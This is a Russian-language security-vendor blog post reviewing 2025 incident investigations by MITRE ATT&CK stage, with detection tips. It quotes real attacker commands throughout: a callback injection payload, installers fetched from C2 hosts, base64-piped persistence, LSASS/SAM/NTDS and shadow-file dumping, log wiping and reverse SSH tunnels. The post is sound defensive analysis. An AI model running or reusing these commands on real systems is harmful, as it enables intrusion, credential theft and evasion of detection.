Привет, Хабр! С вами снова Никита Полосухин, ведущий аналитик в центре мониторинга и реагирования на кибератаки RED Security SOC. Прошлый год был насыщен расследованиями инцидентов новых заказчиков, и по итогам мы сформировали внутренний отчет. В этом материале я поделился самым интересным — разбором необычных историй кибератак, а также списком популярных (и успешных) процедур злоумышленников. Надеюсь, наши кейсы покажутся вам не только интересными, но и помогут при выборе и организации дополнительных мер защиты в этом году. 

В отчете мы использовали классификацию от MITRE ATT&CK, а в этом посте рассмотрим только самые частые или необычные процедуры из всех, что встретились за прошлый год.

Содержание

Разработка ресурсов

Нам встречались как типовые и всем известные утилиты, так и семплы неизвестного вредоносного ПО, которые создавали под конкретную жертву.

Вот наши лидеры среди известных инструментов:

Встречались и такие, но уже намного реже:

  • socks5 — proxy-библиотека;

  • фреймворк для криминалистического анализа дампов оперативной памяти;

  • утилита для сбора информации, реагирования на инциденты и мониторинга информационной безопасности.

И, наконец, уникальные семплы:

  • Вариант OldGremlin.JsDownloader (да-да, они все еще встречаются).

  • DNSPartisan — сложный и целевой бэкдор, используемый группировкой Cyberpartisans-BY.

  • ShadowTunnel — Go-бэкдор для построения цепочек прокси с туннелем aes-in-tls, используемый неатрибутированным злоумышленником.

  • Новая версия бэкдора BrokenDoor от BO-team.

  • Версия бэкдора Vasilek от все тех же Cyberpartisans-BY.

Теперь посмотрим, что происходило на следующих этапах килчейна.

Первоначальный доступ

Сначала немного статистики:

  • Trusted Relationship (T1199) — причина трети всех инцидентов. Рост доли атак через этот вектор также отмечают и наши коллеги из Solar 4RAYS и Positive Technologies.

  • Фишинг (T1566) — регулярно сталкивались с попытками фишинга со стороны акторов BO-team, GOFFEE, OldGremlin и других, но только 10% из них были успешными.

А теперь поделюсь любопытным кейсом. 

Кейс «Темный AppSec»

Мы обнаружили эксплуатацию уязвимости в проприетарном приложении, которое выполняло функцию статистического моделирования и «предсказания» части процессов с помощью математики и машинного обучения. Компания-жертва обернула все в простой UI на Django и опубликовала в Сети.

Необычно то, что на момент публикации злоумышленники уже находились в инфраструктуре жертвы. Выступив в каком-то смысле в роли AppSec-инженеров, они проанализировали исходный код приложения, нашли уязвимость (недостаточную фильтрацию данных), выполнили произвольный код и… загрузили вредоносное ПО в инфраструктуру. 

При этом атакующие били в уязвимый endpoint без разведки или тестов — сразу в точку. Получается, злоумышленники проникли в инфраструктуру, нашли уязвимость в торчащем наружу приложении, создали еще одну точку доступа и начали заливать модифицированный образец TinyShell. Но если у вас уже есть устойчивый доступ в инфраструктуру, зачем такие упражнения?

Хотя с момента инцидента и прошло уже много времени — чтобы однозначно ответить на все вопросы, мы сформировали две гипотезы-объяснения:

  1. Злоумышленники потеряли доступ в инфраструктуру и зашли заново.

  2. Атаковали сразу две группировки. Первые проникли в инфраструктуру, а затем передали информацию вторым. На чем основано это предположение? В 2025 году мы часто сталкивались с тем, что злоумышленники используют обнаруженные в приложениях уязвимости в качестве точек входа для повторной атаки. Так политически мотивированные группировки обмениваются друг с другом информацией, чтобы совершать последовательные нападения — об одном из таких кейсов я подробно рассказывал в статье. А еще в прошлом году мы встречали масштабные инциденты, где виновниками были сразу несколько группировок — они признались, что действовали сообща. Поэтому объединение усилий нескольких группировок для достижения общих целей, на наш взгляд, выходит с уровня точечных «коллабораций» на уровень выстроенного системного процесса.

А еще для успешной эксплуатации уязвимости атакующие использовали интересную технику колбэка, который говорит об успешной эксплуатации уязвимости:

OPTIONS /system/update/%3B%60curl%20-m%2010%20https%3A//requestbin.kanbanbox.com/ HTTP/1.1

Им возвращался колбэк на сервис requestbin.kanbanbox.com, где они и регистрировали свой обработчик таких запросов.

В одном из инцидентов после успешной эксплуатации уязвимости атакующие использовали отстук на редко встречающийся сервис определения внешнего адреса:

curl ident.me|sc ../private/css/c.css

Вывод: злоумышленники используют все больше сервисов, чтобы получить успешный колбэк о своих действиях. Найти их все и выстроить детекты без цунами ложноположительных срабатываний — задача со звездочкой. Ставить корреляции сработок СЗИ и другие техники MITRE ATT&CK на мониторинг — выглядит перспективнее.

Выполнение кода

На этом этапе мы не встретили изощренных техник. В ходу были все те же PowerShell, Bash, CMD, GPO и так далее. В некоторых кейсах встречался JavaScript и Python, но этим никого не удивишь.

Только в одном из инцидентов попался интересный способ выполнения PowerShell на хосте с помощью... velociraptor — того самого, который используют защитники для сбора артефактов. В конфигурации агента в качестве управляющего сервера был указан C2 атакующих:

То есть агент установили напрямую с С2:

msiexec /q /i c2.evil/velo.msi

Еще один не новый, но довольно необычный метод — обработка 1С. Злоумышленники активно пользуются этой уловкой как для выполнения кода, так и для повышения привилегий, ведь в большинстве инсталляций это не запрещено. В нашем случае попался вариант известного в сообществе проекта с открытым исходным кодом — 1C shell.

Закрепление

В этом году мы столкнулись как с распространенными, так и редкими методами закрепления.

Старый добрый .bashrc, cron и gsocket (T1546.004, T1053.003)

Закрепление через .bashrc никуда не ушло, мы нашли его в файле .profile:

# ~/.bashrc: executed by bash(1) for non-login shells.
# DO NOT REMOVE THIS LINE. SEED PRNG. #defunct-kernel 
{ echo <long_base64>|base64 -d|bash;} 2>/dev/null #1b5b324a50524e47 >/dev/random # seed prng defunct-kernel

То же закрепление было и в cron:

# (- installed on Fri Apr 25 17:12:23 2025)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
# DO NOT REMOVE THIS LINE. SEED PRNG. #defunct-kernel
0 * * * * { echo <long_base64>|base64 -d|bash;} 2>/dev/null #1b5b324a50524e47 >/dev/random # seed prng defunct-kernel

Ну и классический gsocket:

/usr/bin/pkill -0 -U1000 defunct 2>/dev/null || SHELL=/bin/bash TERM=xterm-256color GS_ARGS="-k /home/<redacted>/.config/htop/defunct.dat -liqD" /usr/bin/bash -c "exec -a '[netns]' '/home/<redacted>/.config/htop/defunct'" 2>/dev/null

Закрепление через ld_preload и local.conf в механизмах служб Linux (T1574.006)

Достаточно интересная точка закрепления, которую не так легко обнаружить.

В качестве начальной точки, с которой стартует поиск, выступает обращение Rsyslog на порт 53, что встречается нечасто:

udp ESTAB 0 0 172.23.134.79:36314 172.23.1.13:53 users:(("rsyslogd",pid=532126,fd=3)) 

В каталоге с сервисами была директория для rsyslog:

А в ней файл конфигурации: 

И уже внутри него — LD_PRELOAD на вредоносную библиотеку.

Так его не видно в глобальном preload, а созданную директорию никто не заметил (тем более что были подменены метки времени).

Закрепление с помощью легитимных туннелей (T1219, T1543.003)

Атакующие не стесняются использовать в своих целях популярные легитимные туннели. Схема проста: есть зараженный клиент, злоумышленник и посредник в виде CDN крупного вендора. Вот примеры:

Закрепление с помощью... Kaspersky

Чтобы закрепиться в системе и доставлять туда вредоносные msi-пакеты, злоумышленники установили свой Kaspersky Network Agent, который ссылался на сервер злоумышленников:

"C:\Windows\system32\msiexec.exe" /i "Kaspersky Network Agent.msi" /qn SERVERADDRESS=<rogue ksc address> DONT_USE_ANSWER_FILE=1 EULA=1 SERVERSSLPORT=443 USESSL=1 

Повышение привилегий

LSASS (T1003.001)

По-прежнему самый распространенный способ повышения привилегий для Windows — дамп памяти процесса LSASS. В наших инцидентах почти все случаи дампа были построены на методе comsvcs_stealth из проекта lsassy.

%COMSPEC% /Q /c CMD.exe /Q /c for /f "tokens=1,2 delims= " ^%A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do rundll32.exe C:\windows\System32\comsvcs.dll, #+0000^24 ^%B \Windows\Temp\2ItkvlQt.odt full 

Чтобы сдампить процесс lsass, можно забрать всю память. А что если сделать это с помощью утилит, предназначенных для реагирования на инцидент? И вытащить память процесса lsass с помощью memprocfs? Так и поступили злоумышленники по ходу одной из атак:

  • DumpIt.exe /Q /O dump.dmp

  • memprocfs.exe  -device dump.dmp

ESC (T1649)

Уязвимости серии ESC — лакомый кусочек для атакующих, поскольку встречаются во многих инфраструктурах и открывают широкие возможности для экспериментов. 

В одном из инцидентов злоумышленник применил атаку на ADCS (ESC8), скомпрометировал учетную запись контроллера домена и повысил свои привилегии до максимума. 

Чтобы обнаружить такую нежелательную активность, можно отслеживать успешные сетевые входы от имени учетной записи типа DC$ на сервере CA с использованием NTLM-аутентификации.

Exploitation for privilege escalation (T1068)

Мы уже говорили про эксплуатацию уязвимости 1С с помощью внешних обработок. А вот еще один аспект: как правило, такие службы запускаются c повышенными привилегиями не только на самом сервере, но и в домене (потому что так удобнее). 

В этой схеме злоумышленник автоматически повышает свои привилегии, когда добирается до выполнения произвольного кода.

Уклонение от защиты

Indicator removal (T1070)

Мы видели немало попыток зачистить следы действий и защититься от обнаружения:

grep -F "New session" /var/log/auth.log 

/bin/sh /bin/egrep -v "{redacted_ip}|username|\\[pid]|\\[pid]|{redacted_date}" /var/log/auth.log 

/bin/sh /bin/egrep -v "{redacted_ip}|username|\\[pid]|\\[pid]|{redacted_date}" /var/log/syslog 

/bin/sh /bin/egrep -v "{redacted_ip}|username|\\[pid]|\\[pid]|{redacted_date}" /var/log/daemon.log 

grep -Po "(?<=New session )(\\d+)"

grep -F "New session" /var/log/auth.log

shred -fuzv /var/run/log/journal/33e25b14727e42db82b6ff2550d30cf3/system@dd8d9dc991924e40ad99c555b74cbed3-0000000000051f96-000637184be45713.journal
 journalctl --flush --rotate  

Конечно, далеко не всегда следы очистки остаются в явном виде в истории команд. Очистку журналов, особенно журналов аутентификации, в Linux можно находить с помощью появляющихся дыр в таймлайне и событий выхода в журналах без событий входа.

И вот пример для Windows: после установки службы атакующие использовали вот такую технику удаления событий о ее создании и запуске (T1070.001):

$timeThreshold = (Get-Date).AddHours(-1)

$eventsToRemove = Get-WinEvent -LogName System |

  Where-Object {

	($_.TimeCreated -ge $timeThreshold) -and

	(

  	($_.Id -eq 7045) -or

  	($_.Id -eq 7036 -and $_.Message -match "entered the running state")

	)

  }

 

if ($eventsToRemove) {

	foreach ($event in $eventsToRemove) {	

        Clear-EventLog -LogName System

    	break

	}

}

Bind mounts (T1564.013)

Чтобы скрыть вредоносный процесс, атакующий использует монтирование внутри псевдофайловой системы procfs. 

Вот пример команды, которая монтирует директорию из procfs для легитимного процесса (первого попавшегося с ID родительского процесса 1) в директорию procfs вредоносного процесса: 

/bin/sh -c "mount -B /proc/pgrep -P 1 | shuf -n 1 /proc/$MAINPID”

Так вредоносный процесс скрывается от тех команд и утилит, которые обращаются напрямую на procfs. Подробно эту технику описали наши коллеги из Group-IB в постах (первый, второй).

Timestomping  (T1070.006)

Старая добрая подмена временных меток через touch:

touch -r promtail.service nvmei.service
touch -r promtail.service -h multi-user.target.wants 

Masquerading: Match Legitimate Resource Name or Location (T1036.005)

Как всегда, злоумышленники подменяли имена ВПО и закреплений, чтобы их активность не бросалась в глаза. Пример мимикрии клиента SSH под KSN Proxy или klnagent.exe:

C:\ProgramData\Microsoft\Network\Connections\ksnproxy.exe -o StrictHostKeyChecking=no -o UserKnownHostsFile=NUL -R 8080 -N -f -i C:\ProgramData\Microsoft\Network\Connections\options.inf -p 80 http@c2.evil
C:\Windows\Temp\KAVREM~1\BA3F1D~1\exec\klnagent.exe -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -o ServerAliveCountMax=15 -f -N -R 31001 -p443 127001a@anotherc2.evil

А вот маскировка исполняемого файла под легитимный на конкретном сервере, где исходно была утилита youtube-dl:

/lib/systemd/system/youtube-dl.service

Или маскировка под утилиту из набора sysstat:

/usr/lib/sysstat/sadb

И еще — под легитимную системную библиотеку:

C:\Windows\System32\dfxhost.dll

Еще один любопытный метод, чтобы скрыть расширения исполняемого файла — добавить большое количество пробелов (Space after Filename, T1036.006):

Sandbox Evasion (T1497) — кейс защиты от песочниц

Интересный кейс защиты от песочниц мы нашли в дроппере, который запускал бэкдор BrokenDoor. Его разбирали наши коллеги в отчете и в посте, а мы — как быстро проанализировать подобное в подробном мануале.

Итак, внутри дроппера зашит зашифрованный шелл-код, который расшифровывается в рантайме. Шелл-код получает указатель на функцию GetKeyboradLayoutList и в цикле ищет на зараженной машине раскладку 0x0419 (то есть русскую). Если не находит, вредоносное ПО завершает работу: в России нет реально полезных общедоступных песочниц, таких как ANY.RUN, Triage, VirusTotal и подобных. Большинство начинающих и неопытных аналитиков чуть ли не полностью полагаются на VirusTotal при проверке вредоносности ПО. Останавливая работу в (предположительно) зарубежных инфраструктурах, ВПО по сути остается в слепой зоне для тех ресурсов, которые могли бы его «разоблачить».

33 C9                    xor     ecx, ecx      ; i = 0
B8 19 04 00 00           mov     eax, 419h     ; eax = 0x0419, указатель на русскую раскладку
66 0F 1F 44 00 00        nop dword ptr [rax+rax+00h] 
; ---- цикл по всем раскладкам----
66 39 04 CF              cmp     [rdi+rcx*8], ax ; сравнить LOWORD(HKL[i]) с 0x0419
74 1F                    je      short found
48 FF C1                 inc     rcx           ; i++
48 3B CE                 cmp     rcx, rsi      ; i < count?
7C F2                    jl      short loop
; ---- не нашли русскую----
32 C0                    xor     al, al        ; al = 0
48 8B 5C 24 30
48 8B 6C 24 38
48 8B 74 24 40
48 83 C4 20
5F
C3                      ; return
; ---- нашли, в младший байт кладем 1 ----
B0 01                   found: mov al, 1       ; al = 1

Группировка Cyberpartisans-BY

Наш победитель в номинации «уклонист года» — группировка Cyberpartisans-BY. В их арсенале мы встретили методы:

  1. Использование сложной и многоступенчатой обфускации (T1027.007, T1027.016). Вместо нормального псевдокода было подобное:

  2. Мимикрия под легитимные исполняемые файлы и библиотеки (T1036.005): /usr/sbin/nvmei, /usr/lib/x86_64-linux-gnu/{libnsan.so,libas.so,libmono.so} и другие.

  3. Изменение временных меток с помощью touch (T1070.006).

  4. Проверки внутри семпла (T1497.001, T1497.002):

    1. hostname (имя домена Active Directory в случае Windows);

    2. arp-таблица (важно, что эта проверка встречалась не во всех  семплах) /proc/self/environ;

    3. + захардкоженный список DNS-серверов (как локальных, так и внешних) для туннелей.

  5. Подмена A-записи для доменов C2. То есть для вредоносных доменов выставляется A-запись известного легитимного сайта, а взаимодействия происходят по CNAME:

  6. Использование зашифрованного DNS-туннеля (T1071.004, T1572, T1573.001).

  7. Отсутствие полезной нагрузки в самом семпле, работа через подгружаемые шелл-коды (T1620).

Кроме того, в одном из кейсов злоумышленники весьма остроумно маскировали бэкдор Vasilek (о нем мы уже говорили в своем исследовании). 

Пользователи платформы Zabbix знают, что для оповещений в Telegram есть легитимный скрипт zbxtg.py, который нужно расположить в папке

/usr/lib/zabbix/alertscripts.

Поэтому вредоносный файл атакующие назвали zbxtg.py и разместили по пути:

 /root/zabbix/alertscripts/telegram/zbxtg.py.

И этот трюк сработал: один из администраторов зараженной компании долго уверял нас, что это легитимный скрипт для отправки телеметрии в Zabbix.

Cбор учетных данных

Для начала — список директорий, которые посещают для сбора учетных данных чаще всего:
  • Users\username\AppData\Local\Google\Chrome\User Data\Default\Login Data

  • Users\username\AppData\Local\Google\Chrome\User Data\Default\Cookies

  • Users\username\AppData\Local\Microsoft\Edge\User Data

  • Users\username\Downloads

  • \.cisco\vpn\log

  • Users\username\.ssh

  • Users\username\AppData\Roaming\Microsoft\Credentials

  • Users\%USER%\AppData\Roaming\Microsoft\Protect\%SID%\

  • Cert:\LocalMachine\My

А теперь — к популярным техникам.

Unsecured Credentials (T1552)

Сбор учетных записей — это поле, где можно встретить самые разные подтехники. Чаще встречается классический тихий сбор истории команд и SSH-ключей (T1552.004, T1552.003):

tar c root/.bash_history root/.ssh home/*/.bash_history home/*/.ssh

find /home/ -maxdepth 2 -iname *.bash_history -exec echo + cat {} ; -exec cat {} ;


%UserProfile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Из интересного — злоумышленник сохранил копии веток реестра SAM и SECURITY на скомпрометированных Windows-узлах при помощи системной утилиты esentutl.exe (T1003.004):

esentutl.exe /y -vss C:\Windows\System32\config\SECURITY /d log3.bin
esentutl.exe /y -vss C:\Windows\System32\config\SAM /d log.bin 

Часто атакующие используют инструменты для удаленного дампа реестра через RPC (T1003.004):

И еще:

Подробнее о технике можно почитать в посте у коллег.

А вот пример стандартного dcsync для сбора учетных данных со всего домена (DCSync T1003.006):

И все так же популярно копирование файлов passwd и shadow (passwd и shadow, T1003.008):

cp /etc/shadow /tmp/773fafda
cp /etc/shadow /tmp/5aeec3de-e1b4-4962-8e79-eba56baed6d1

Dump NTDS.dit (T1003.003)

В базе данных Active Directory хранится очень много полезной информации для злоумышленников: связи, хеши паролей, права и так далее. И вот реальные примеры:

ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\\programdata\\usolocal\\1' q q
cmd.exe /c copy "\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\NTDS\\NTDS.dit" .

А теперь самое интересное: чтобы расшифровать мастер-ключи пользователей, злоумышленнику нужно либо знать их пароли (брутфорсить их из хешей довольно накладно по времени), либо достать приватные backup-ключи с контроллера домена. В нашем случае кампания Cloaked Shadow использовала протокол MS-LSAD. 

Заметить такую активность можно с помощью события с eid 4662.

Изучение

Злоумышленников привлекают сервисы Сonfluence и Gitlab (и их аналоги), ведь нередко искомая информация хранится там уже в структурированном виде.

Вот пример, как ищут пароли в Gitlab (T1213.003):
  • GET /search/count?scope=merge_requests&search=secret

  • GET /search/count?scope=issues&search=secret

  • GET /search/count?scope=users&search=secret

  • GET /search/count?scope=milestones&search=secret GET /search?search=secret&nav_source=navbar

  • GET /search/count?scope=issues&search=pass

  • GET /search/count?scope=merge_requests&search=pass

  • GET /search/count?scope=milestones&search=pass

  • GET /search/count?scope=users&search=pass

  • GET /search?search=pass&nav_source=navbar

  • GET /search/count?scope=milestones&search=password

  • GET /search/count?scope=users&search=password

  • GET /search/count?scope=merge_requests&search=password

  • GET /search/count?scope=issues&search=password

  • GET /search?search=password&nav_source=navbar

 Любопытно, что атакующие интересуются, какие правила аудита  настроены:

cat /etc/audit/auditd.conf
find /etc/audit/ -type f -exec cat {} ;

А также проверяют, кто залогинился по rdp на хост в последние 30 дней (T1654):

Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-TerminalServices-LocalSessionManager/Operational'; Id=25; StartTime=(Get-Date).AddDays(-30)} | ForEach-Object { $userDomain = if ($_.Properties[0].Value) { $_.Properties[0].Value } else { 'Unknown' }; $ip = if ($_.Properties[2].Value) { $_.Properties[2].Value } else { 'Unknown' }; New-Object PSObject -Property @{ TimeCreated = $_.TimeCreated; User = $userDomain; IP = $ip } } }

Кроме того, атакующие сканируют сетевые ресурсы SMB (C$, D$) на доступных узлах. Каждая попытка проверить права доступа к сетевой папке (успешная или нет) регистрируется системой как событие с Event ID 5145. И если такое единичное событие является нормой, то массовое сканирование порождает настоящий шторм из тысяч событий с одного IP-адреса (и чаще от одной учетной записи) за короткий промежуток времени. 

Для таких случаев можно написать эффективное правило корреляции для SIEM (T1135).

Перемещение

В основном для перемещения по инфраструктуре злоумышленники используют старые и проверенные инструменты (RDP, SSH, SMB). Мы же столкнулись с нетипичным случаем, в котором был замешан уже знакомый нам подозреваемый... KSC. 

В инфраструктуре заказчика был сервер, который использовали как терминальный jump-host. С него была видна почти вся инфраструктура, и поэтому стояла мультифакторная аутентификация. Чтобы продвинуться на этот сервер, злоумышленник использовал уже скомпрометированный KSC (и почему-то MFA на нем не было) и отправил на него программную закладку (T1072) через установку сторонних MSI-пакетов.

Сбор данных

Мы уже упоминали про сбор данных с Gitlab. Также выяснилось, что мошенники активно собирают:

  • истории терминалов, псевдотерминалов и редакторов (mc, vi и так далее);

  • файлы, относящиеся к активности учетной записи Ansible;

  • конфигурации SSHD, Auditd и других сервисов и приложений;

  • журналы приложений и журналы аудита операционной системы.

Организация управления

По-прежнему в ходу у мошенников SSH-туннели, причем активнее стали использовать SSH именно на Windows-хостах. Также мы фиксируем активный интерес к WebSocket и легитимным туннелям по типу VS Code и Cloudflare.

Тем не менее встречаются и старожилы, которые делают свой кастомный протокол. Например, в одном из своих исследований мы описывали уникальный образец ВПО Shadow Tunnel (T1095,T1572,T1090.003).

В этом же кейсе мы находили еще пару интересных техник:

  1. Использование Fallback Channels (T1008) и DGA (T1568.002) техник семплами PartisanDNS.

  2. Использование MultiHop Proxy (1090.003) с помощью семплов DQuic для работы в сегментах жертвы без интернета.

Основные выводы

В 2025 год было немало ярких и громких кейсов, активно появлялись новые техники и любопытные семплы. И вот какие основные тенденции мы выделили: 

  1. Заметно прогрессировало число атак через вектор trusted relationship (что отмечает большинство вендоров). 

  2. Выросло число новых акторов, семплов, вариантов технической реализации атак. Как итог — даже выстроенный подход к информационной безопасности и достаточно высокая зрелость процессов далеко не всегда успевают за динамикой бизнеса и действиями злоумышленников.

  3. Кооперация и двойные атаки — все чаще так работают группировки с похожими целями и идеологией. Подробнее об этом скоро расскажем в блоге

В 2026 году мы ожидаем еще большего роста атак и инцидентов, поэтому важно оставаться начеку и быть готовым к разнообразию киберугроз. А мы продолжим делиться информацией о трендовых методиках и инструментах злоумышленников, чтобы команды ИБ могли оперативнее выстраивать линию защиты. Не переключайтесь.